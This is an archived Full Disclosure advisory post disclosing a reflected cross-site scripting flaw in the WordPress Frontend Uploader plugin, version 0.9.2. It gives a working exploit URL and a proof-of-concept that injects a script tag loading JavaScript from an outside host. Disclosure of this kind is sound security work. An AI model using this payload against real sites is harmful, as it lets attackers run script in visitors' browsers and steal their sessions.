lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <14a8d2fd457.f01a2e7570499.5831076379738549250@secupent.com>
Date: Sat, 27 Dec 2014 11:18:49 -0800
From: SECUPENT Research Center <research@...upent.com>
To: <fulldisclosure@...lists.org>
Subject: [FD] Wordpress Frontend Uploader Cross Site Scripting(XSS)

Exploit Title:  Wordpress Frontend Uploader Cross Site Scripting(XSS)
Software Link: https://wordpress.org/plugins/frontend-uploader/
Author: SECUPENT 
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 27-12-2014
Version: 0.9.2




Exploit :


http://TARGET/[forntEndUploaderPage]=59&amp;errors[fu-disallowed-mime-type][0][name]=XSS 


Example(p0c): 
http://EXAMPLE/wordpress/?page_id=59&amp;&amp;errors[fu-disallowed-mime-type][0][name]=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js?%3C%20B%20%3E


Screenshot: 
Link: http://secupent.com/exploit/images/frontend-uploader-xss.png
Mirror: http://vulnerability.io/exploit/images/frontend-uploader-xss.png


Special Thanks: vulnerability.io, pentester.io, osvdb.org, exploit-db.com, 1337day.com, cxsecurity.com, packetstormsecurity.com and all other exploit archives, hackers and security researchers.  


View attachment "wordpress frontend uploader XSS.txt" of type "text/plain" (846 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ